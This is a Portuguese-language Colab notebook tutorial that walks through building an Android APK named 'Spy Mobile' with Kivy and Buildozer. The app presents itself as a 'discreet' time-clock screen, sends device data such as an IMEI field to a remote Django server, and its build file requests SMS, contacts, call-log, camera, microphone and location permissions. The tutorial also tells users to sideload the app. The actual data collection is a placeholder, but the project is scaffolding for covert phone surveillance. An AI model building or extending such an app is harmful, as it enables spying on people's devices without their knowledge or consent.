# 📱 TUTORIAL: Gerar APK do Sistema Spy Mobile no Google Colab

Este tutorial vai te ensinar a gerar o APK do seu sistema main.py de forma prática e rápida.

## ⚠️ IMPORTANTE:
- Execute as células na ordem
- Aguarde cada célula terminar antes de executar a próxima
- O processo completo leva cerca de 15-20 minutos


## 🔧 PASSO 1: Configurar Ambiente Android

In [ ]:
# Instalar dependências do sistema
!apt update -qq
!apt install -y openjdk-8-jdk unzip wget git python3-pip

# Configurar JAVA_HOME
import os
os.environ['JAVA_HOME'] = '/usr/lib/jvm/java-8-openjdk-amd64'
print(f"JAVA_HOME configurado: {os.environ['JAVA_HOME']}")

## 📱 PASSO 2: Baixar Android SDK e NDK

In [ ]:
# Criar diretórios
!mkdir -p /content/android-sdk
!mkdir -p /content/android-ndk

# Baixar Android SDK Command Line Tools
!wget -q https://dl.google.com/android/repository/commandlinetools-linux-8512546_latest.zip -O /content/cmdtools.zip
!unzip -q /content/cmdtools.zip -d /content/android-sdk/
!mv /content/android-sdk/cmdline-tools /content/android-sdk/cmdline-tools-temp
!mkdir -p /content/android-sdk/cmdline-tools/latest
!mv /content/android-sdk/cmdline-tools-temp/* /content/android-sdk/cmdline-tools/latest/

# Baixar Android NDK
!wget -q https://dl.google.com/android/repository/android-ndk-r25b-linux.zip -O /content/ndk.zip
!unzip -q /content/ndk.zip -d /content/
!mv /content/android-ndk-r25b /content/android-ndk/

print("✅ SDK e NDK baixados com sucesso!")

## 🔑 PASSO 3: Configurar Variáveis de Ambiente

In [ ]:
# Configurar variáveis de ambiente
import os

os.environ['ANDROID_HOME'] = '/content/android-sdk'
os.environ['ANDROID_SDK_ROOT'] = '/content/android-sdk'
os.environ['ANDROID_NDK_HOME'] = '/content/android-ndk'
os.environ['NDK_HOME'] = '/content/android-ndk'
os.environ['PATH'] = f"{os.environ['PATH']}:/content/android-sdk/cmdline-tools/latest/bin:/content/android-sdk/platform-tools"

# Instalar componentes do SDK
!yes | /content/android-sdk/cmdline-tools/latest/bin/sdkmanager --licenses
!/content/android-sdk/cmdline-tools/latest/bin/sdkmanager "platform-tools" "platforms;android-30" "build-tools;30.0.3"

print("✅ Ambiente Android configurado!")
print(f"ANDROID_HOME: {os.environ['ANDROID_HOME']}")
print(f"NDK_HOME: {os.environ['NDK_HOME']}")

## 🐍 PASSO 4: Instalar Python-for-Android e Buildozer

In [ ]:
# Instalar dependências Python
!pip install --upgrade pip
!pip install buildozer python-for-android cython
!pip install kivy pyjnius requests plyer

# Verificar instalação
!buildozer --version
print("✅ Buildozer instalado com sucesso!")

## 📁 PASSO 5: Criar Estrutura do Projeto

In [ ]:
# Criar diretório do projeto
!mkdir -p /content/spy-mobile
%cd /content/spy-mobile

# Criar main.py simplificado para o APK
main_py_content = '''from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.button import Button
from kivy.clock import Clock
from kivy.core.window import Window
from kivy.graphics import Color, Rectangle
import time
import requests

# Configuração do endpoint Django
DJANGO_IP = '192.168.0.97'  # ALTERE PARA SEU IP
DJANGO_PORT = '8000'
ENDPOINT_BASE = f'http://{DJANGO_IP}:{DJANGO_PORT}/api/'

class DigitalTimerLabel(Label):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.font_size = 96
        self.color = (0.3, 0.3, 0.3, 1)
        self.bold = True

class SpyMobile(BoxLayout):
    def __init__(self, **kwargs):
        super().__init__(orientation='vertical', **kwargs)
        
        with self.canvas.before:
            Color(0, 0, 0, 1)
            self.rect = Rectangle(size=Window.size, pos=self.pos)
        
        self.bind(size=self._update_rect, pos=self._update_rect)
        
        self.is_monitoring = False
        self.start_time = None
        self.timer_event = None
        
        main_layout = BoxLayout(orientation='vertical', padding=20, spacing=20)
        
        title_label = Label(
            text='SISTEMA DE PONTO',
            font_size=24,
            color=(1, 0, 0, 1),
            bold=True
        )
        main_layout.add_widget(title_label)
        
        self.timer_label = DigitalTimerLabel(text='00:00:00')
        main_layout.add_widget(self.timer_label)
        
        self.status_label = Label(
            text='Sistema parado - Clique em PLAY para iniciar',
            font_size=16,
            color=(0.7, 0, 0, 1)
        )
        main_layout.add_widget(self.status_label)
        
        buttons_layout = BoxLayout(orientation='horizontal', size_hint_y=0.3, spacing=15)
        
        self.play_button = Button(
            text='PLAY',
            font_size=20,
            background_color=(0, 0.7, 0, 1),
            bold=True
        )
        self.play_button.bind(on_press=self.start_monitoring)
        buttons_layout.add_widget(self.play_button)
        
        self.collect_button = Button(
            text='COLETAR',
            font_size=18,
            background_color=(0, 0.5, 0.8, 1),
            bold=True,
            disabled=True
        )
        self.collect_button.bind(on_press=self.manual_collect)
        buttons_layout.add_widget(self.collect_button)
        
        self.stop_button = Button(
            text='STOP',
            font_size=20,
            background_color=(0.7, 0, 0, 1),
            bold=True,
            disabled=True
        )
        self.stop_button.bind(on_press=self.stop_monitoring)
        buttons_layout.add_widget(self.stop_button)
        
        main_layout.add_widget(buttons_layout)
        
        info_label = Label(
            text='Sistema seguro e discreto',
            font_size=12,
            color=(0.5, 0, 0, 1)
        )
        main_layout.add_widget(info_label)
        
        self.add_widget(main_layout)

    def _update_rect(self, instance, value):
        self.rect.size = instance.size
        self.rect.pos = instance.pos

    def start_monitoring(self, instance):
        if not self.is_monitoring:
            self.is_monitoring = True
            self.start_time = time.time()
            
            self.status_label.text = 'Coletando dados do dispositivo...'
            self.timer_label.color = (1, 0, 0, 1)
            
            self.play_button.disabled = True
            self.collect_button.disabled = False
            self.stop_button.disabled = False
            
            self.timer_event = Clock.schedule_interval(self.update_timer, 1)
            Clock.schedule_once(lambda dt: self.executar_coleta(), 2)

    def stop_monitoring(self, instance):
        if self.is_monitoring:
            self.is_monitoring = False
            
            if self.timer_event:
                self.timer_event.cancel()
            
            self.status_label.text = 'Sistema parado - Clique em PLAY para iniciar'
            self.timer_label.color = (0.3, 0.3, 0.3, 1)
            self.timer_label.text = '00:00:00'
            
            self.play_button.disabled = False
            self.collect_button.disabled = True
            self.stop_button.disabled = True

    def manual_collect(self, instance):
        if self.is_monitoring:
            self.status_label.text = 'Coletando novos dados...'
            Clock.schedule_once(lambda dt: self.executar_coleta(), 0.5)

    def update_timer(self, dt):
        if self.is_monitoring and self.start_time:
            elapsed = int(time.time() - self.start_time)
            h = elapsed // 3600
            m = (elapsed % 3600) // 60
            s = elapsed % 60
            
            timer_text = f'{h:02d}:{m:02d}:{s:02d}'
            self.timer_label.text = timer_text
            
            if s % 2 == 0:
                self.timer_label.color = (1, 0, 0, 1)
            else:
                self.timer_label.color = (0.8, 0, 0, 1)

    def executar_coleta(self):
        try:
            # Simular coleta de dados
            data = {
                'imei': 'dispositivo_teste',
                'timestamp': time.time(),
                'status': 'ativo'
            }
            
            # Tentar enviar dados (vai falhar se servidor não estiver rodando)
            try:
                response = requests.post(f'{ENDPOINT_BASE}atividade/', json=data, timeout=5)
                if response.status_code == 200:
                    self.status_label.text = 'Dados enviados com sucesso!'
                else:
                    self.status_label.text = 'Dados coletados (servidor offline)'
            except:
                self.status_label.text = 'Dados coletados (servidor offline)'
                
        except Exception as e:
            self.status_label.text = f'Erro na coleta: {str(e)[:30]}'

class SpyMobileApp(App):
    def build(self):
        Window.clearcolor = (0, 0, 0, 1)
        return SpyMobile()

if __name__ == '__main__':
    SpyMobileApp().run()
'''

# Salvar main.py
with open('main.py', 'w') as f:
    f.write(main_py_content)

print("✅ Projeto criado com sucesso!")
!ls -la

## ⚙️ PASSO 6: Criar Arquivo buildozer.spec

In [ ]:
# Criar buildozer.spec otimizado
buildozer_spec = '''[app]

# (str) Title of your application
title = Spy Mobile

# (str) Package name
package.name = spymobile

# (str) Package domain (needed for android/ios packaging)
package.domain = org.example

# (str) Source code where the main.py live
source.dir = .

# (list) Source files to include (let empty to include all the files)
source.include_exts = py,png,jpg,kv,atlas,ico

# (str) Application versioning (method 1)
version = 0.1

# (list) Application requirements
requirements = python3,kivy,pyjnius,requests,plyer

# (str) Supported orientation (landscape, sensorLandscape, portrait, sensorPortrait or all)
orientation = portrait

# (bool) Indicate if the application should be fullscreen or not
fullscreen = 0

# (int) Target Android API, should be as high as possible.
android.api = 30

# (int) Minimum API your APK will support.
android.minapi = 21

# (str) Android NDK version to use
android.ndk = 25b

# (str) Android SDK version to use
android.sdk = 30

# (str) Android logcat filters to use
android.logcat_filters = *:S python:D

# (bool) Copy library instead of making a libpymodules.so
android.copy_libs = 1

# (str) The Android arch to build for, choices: armeabi-v7a, arm64-v8a, x86, x86_64
android.archs = arm64-v8a

# (bool) enables Android auto backup feature (Android API >=23)
android.allow_backup = True

# (str) The format used to package the app for release mode (aab or apk).
android.release_artifact = apk

[buildozer]

# (int) Log level (0 = error only, 1 = info, 2 = debug (with command output))
log_level = 2

# (int) Display warning if buildozer is run as root (0 = False, 1 = True)
warn_on_root = 0

[app:android.permissions]
INTERNET = 1
ACCESS_FINE_LOCATION = 1
ACCESS_COARSE_LOCATION = 1
READ_CONTACTS = 1
READ_SMS = 1
READ_CALL_LOG = 1
READ_EXTERNAL_STORAGE = 1
WRITE_EXTERNAL_STORAGE = 1
CAMERA = 1
RECORD_AUDIO = 1
ACCESS_NETWORK_STATE = 1
ACCESS_WIFI_STATE = 1
'''

# Salvar buildozer.spec
with open('buildozer.spec', 'w') as f:
    f.write(buildozer_spec)

print("✅ buildozer.spec criado com sucesso!")
!cat buildozer.spec | head -20

## 🚀 PASSO 7: Gerar APK (PROCESSO PRINCIPAL)

In [ ]:
# Configurar variáveis de ambiente novamente
import os
os.environ['ANDROID_HOME'] = '/content/android-sdk'
os.environ['ANDROID_SDK_ROOT'] = '/content/android-sdk'
os.environ['ANDROID_NDK_HOME'] = '/content/android-ndk'
os.environ['NDK_HOME'] = '/content/android-ndk'
os.environ['JAVA_HOME'] = '/usr/lib/jvm/java-8-openjdk-amd64'

# Inicializar buildozer
!buildozer init

print("🔥 INICIANDO GERAÇÃO DO APK...")
print("⏰ Este processo pode levar 15-20 minutos")
print("📱 Aguarde até ver 'APK GERADO COM SUCESSO!'")

# Gerar APK
!buildozer android debug

## 📥 PASSO 8: Verificar e Baixar APK

In [ ]:
# Verificar se APK foi gerado
import os
import glob

# Procurar pelo APK
apk_files = glob.glob('/content/spy-mobile/bin/*.apk')

if apk_files:
    apk_path = apk_files[0]
    apk_size = os.path.getsize(apk_path) / (1024*1024)  # MB
    
    print(f"🎉 APK GERADO COM SUCESSO!")
    print(f"📁 Localização: {apk_path}")
    print(f"📏 Tamanho: {apk_size:.2f} MB")
    
    # Listar arquivos na pasta bin
    print("\n📂 Arquivos na pasta bin:")
    !ls -lh /content/spy-mobile/bin/
    
    # Copiar APK para área de download
    !cp {apk_path} /content/SpyMobile.apk
    
    print("\n✅ APK copiado para /content/SpyMobile.apk")
    print("\n📱 COMO BAIXAR O APK:")
    print("1. Clique no ícone de pasta (📁) no painel esquerdo")
    print("2. Procure pelo arquivo 'SpyMobile.apk'")
    print("3. Clique nos 3 pontos (...) ao lado do arquivo")
    print("4. Selecione 'Download'")
    
else:
    print("❌ APK não foi gerado. Verifique os erros acima.")
    print("\n🔍 Verificando pasta bin:")
    !ls -la /content/spy-mobile/bin/ 2>/dev/null || echo "Pasta bin não existe"

## 📋 PASSO 9: Informações Importantes

In [ ]:
print("📱 INFORMAÇÕES IMPORTANTES SOBRE O APK:")
print("="*50)
print("\n🔧 CONFIGURAÇÃO:")
print("• Nome do App: Spy Mobile")
print("• Pacote: org.example.spymobile")
print("• Versão: 0.1")
print("• API Mínima: Android 5.0 (API 21)")
print("• Arquitetura: ARM64")

print("\n🔐 PERMISSÕES INCLUÍDAS:")
print("• Internet")
print("• Localização (GPS)")
print("• Contatos")
print("• SMS")
print("• Histórico de chamadas")
print("• Armazenamento")
print("• Câmera")
print("• Microfone")
print("• Estado da rede")

print("\n⚙️ ANTES DE INSTALAR:")
print("1. Altere o IP no código (192.168.0.97) para o IP do seu servidor")
print("2. Certifique-se que o servidor Django está rodando")
print("3. Habilite 'Fontes desconhecidas' no Android")
print("4. Instale o APK normalmente")

print("\n🔄 PARA GERAR NOVA VERSÃO:")
print("1. Modifique o main.py conforme necessário")
print("2. Execute novamente a célula 'PASSO 7'")
print("3. Aguarde a nova compilação")

print("\n✅ TUTORIAL CONCLUÍDO COM SUCESSO!")
print("📱 Seu APK está pronto para uso!")

## 🔧 SOLUÇÃO DE PROBLEMAS

### ❌ Se der erro na compilação:
1. Execute novamente o PASSO 7
2. Verifique se todas as células anteriores foram executadas
3. Reinicie o runtime se necessário

### 📱 Se o APK não instalar:
1. Habilite "Fontes desconhecidas" no Android
2. Verifique se o dispositivo é ARM64
3. Certifique-se que é Android 5.0 ou superior

### 🌐 Se não conectar ao servidor:
1. Altere o IP no main.py (linha DJANGO_IP)
2. Certifique-se que o servidor Django está rodando
3. Verifique se o dispositivo está na mesma rede

### 🔄 Para personalizar o app:
1. Modifique o main.py na célula do PASSO 5
2. Execute novamente os PASSOS 5, 6 e 7
3. Baixe o novo APK
